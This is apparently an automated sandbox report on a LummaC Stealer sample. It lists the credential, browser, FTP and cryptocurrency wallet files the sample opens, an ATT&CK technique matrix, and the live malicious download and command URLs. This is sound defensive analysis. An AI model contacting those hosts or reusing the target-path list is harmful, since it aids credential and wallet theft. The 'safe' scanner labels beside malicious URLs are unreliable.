Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Directory queried: number of queries: 1001

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	23 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	12 Process Injection	2 Obfuscated Files or Information	11 Input Capture	36 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	111 Masquerading	NTDS	13 Process Discovery	Distributed Component Object Model	11 Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
JSWunwO4rS.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\136140\Concerts.com	3%	ReversingLabs

Source	Detection	Scanner	Label
https://wserdtfyguhij.2024-vipticket.com/k.mp4C	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4xqbfn	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4w	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/IntroductoryTunes.exep	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-viptickp	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4H	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4p	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4l	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4dows	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4unh	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp475	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4e	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4j	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4...	0%	Avira URL Cloud	safe
https://bendydully.click/api	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4mLMEM	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4C:	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4Dri	0%	Avira URL Cloud	safe
http://line.naver.jp0	0%	Avira URL Cloud	safe
http://wserdtfyguhij.2024-vipticket.com	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4~	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4OOC:	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4ass	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4https://	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4$global:?	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/IntroductoryTunes.exe	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/IntroductoryT	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4(	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4)	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4...(J	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4%	0%	Avira URL Cloud	safe
https://wserdtfyguhij.2024-vipticket.com/k.mp4#	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
wserdtfyguhij.2024-vipticket.com	172.67.219.101	true	true	unknown
bendydully.click	104.21.10.2	true	true	unknown
mnzXUlzpaVuBYoehcauIn.mnzXUlzpaVuBYoehcauIn	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wserdtfyguhij.2024-vipticket.com/k.mp4	true	Avira URL Cloud: safe	unknown
https://bendydully.click/api	true	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/IntroductoryTunes.exe	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4xqbfn	mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-viptickp	powershell.exe, 00000007.00000002.2175697500.00000198343E8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/IntroductoryTunes.exep	powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019834085000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wserdtfyguhij.2024-vipticket.com	powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019834085000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000006.00000003.2108378520.0000023434660000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4H	mshta.exe, 00000005.00000003.2238526594.000001FCD854E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2239040824.000001FCD855F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250909549.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2249202946.000001F4D5A50000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242459473.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000002.00000002.2086496736.000001DE939E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Sophisticated.9.dr, Concerts.com.10.dr	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4C	mshta.exe, 00000005.00000003.2239040824.000001FCD855F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250909549.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242459473.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4	mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2246280426.000001FCDC5D5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4w	mshta.exe, 00000005.00000002.2248744845.000001F4D57E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket	powershell.exe, 00000002.00000002.2086496736.000001DE93EA2000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4p	powershell.exe, 00000004.00000002.2079166575.0000017180001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4dows	mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4l	mshta.exe, 00000005.00000003.2238526594.000001FCD854E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248744845.000001F4D57E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2239040824.000001FCD855F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250909549.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242459473.000001FCD856E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4j	mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4unh	powershell.exe, 00000004.00000002.2082048730.00000171ED5AC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4...	mshta.exe, 00000005.00000003.2238526594.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2242539578.000001FCD853F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250851801.000001FCD8540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp475	mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4e	mshta.exe, 00000005.00000003.2237861906.000001FCDC45B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2086496736.000001DE93A2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2079166575.0000017180088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4c	mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4mLMEM	mshta.exe, 00000005.00000002.2251189678.000001FCDC45F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240187331.000001FCDC45F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4C:	mshta.exe, 00000005.00000002.2248903081.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248744845.000001F4D57E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2238124041.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2244892454.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4Dri	mshta.exe, 00000005.00000002.2249280903.000001F4D5A80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	Concerts.com, 00000013.00000000.2207209927.0000000000D19000.00000002.00000001.01000000.00000012.sdmp, Significantly.9.dr, Concerts.com.10.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2175697500.0000019834436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	false		high
